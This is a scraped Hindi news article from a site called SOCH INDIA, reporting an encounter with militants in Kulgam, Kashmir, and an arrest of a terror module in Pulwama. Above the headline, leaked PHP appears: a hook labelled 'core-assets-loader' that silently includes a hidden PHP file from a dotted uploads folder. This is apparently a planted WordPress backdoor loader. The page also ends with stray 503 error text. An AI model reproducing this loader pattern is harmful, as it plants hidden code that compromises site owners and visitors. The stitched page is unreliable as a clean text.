add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कश्मीर के कुलगाम में आतंकियों से मुठभेड़, सेना के 4 जवान घायल, इलाके में तलाशी अभियान जारी – SOCH INDIA
Menu

देश
कश्मीर के कुलगाम में आतंकियों से मुठभेड़, सेना के 4 जवान घायल, इलाके में तलाशी अभियान जारी

nobanner

सुरक्षाबलों और आतंकियों के बीच कश्मीर में कुलगाम के आदिगाम देवसर इलाके में मुठभेड़ जारी है. इस मुठभेड़ में सेना के 3 जवान और एक पुलिसकर्मी घायल हो गए हैं. घायलों को अस्पताल में भर्ती कराया गया है.

भारतीय सेना ने सोशल मीडिया पर जानकरी देते हुए बताया, “विशिष्ट खुफिया जानकारी के आधार पर, आज भारतीय सेना और जम्मू-कश्मीर द्वारा अरिगाम, कुलगाम में एक संयुक्त अभियान शुरू किया गया. तलाशी के दौरान आतंकवादियों ने अंधाधुंध गोलीबारी की और गोलीबारी शुरू हो गई. ऑपरेशन जारी है”

जम्मू-कश्मीर पुलिस ने दी जानकारी

जम्मू-कश्मीर पुलिस ने सोशल मीडिया पर जानकारी देते हुए लिखा, “कुलगाम के आदिगाम देवसर इलाके में मुठभेड़ हो रही है. पुलिस और सुरक्षा मौके पर मौजूद हैं. आगे की जानकारी जल्द ही साझा की जाएगी.” इसी बीच आतंकवादियों को भागने से रोकने के लिए अतिरिक्त सुरक्षा बल बुलाए गए हैं.

सेना, जम्मू-कश्मीर पुलिस और सुरक्षा एजेंसियां भी इस ऑपरेशन में शामिल हैं. प्रशासन पूरे हालात पर नजर बनाए हुए हैं. बता दें कि आतंकी लगातार जम्मू-कश्मीर में अशांति फैलाने की कोशिश में लगे हुए हैं. इसी को लेकर घाटी में आतंकियों पर नकेल कसने के लिए लगातार सर्च ऑपरेशन चलाए जा रहे हैं.

6 आतंकियों को किया गया था गिरफ्तार

वहीं, शुक्रवार को पुलिस ने पुलवामा के अवंतीपोरा में टेरर मॉड्यूल का खुलासा किया है. पुलिस ने जैश-ए-मोहम्मद के 6 आतंकी सहयोगियों को गिरफ्तार किया है. ये युवाओं को आतंकवाद की ट्रेनिंग देते थे. पुलिस ने इनके पास से 5 IED, 30 डेटोनेटर, IED की 17 बैटरी, 2 पिस्टल, 3 मैगजीन, 25 राउंड, 4 हैंड ग्रेनेड और 20 हजार कैश बरामद किया है. खुफिया जानकारी मिलने के बाद पुलिस ने ये कार्रवाई की थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.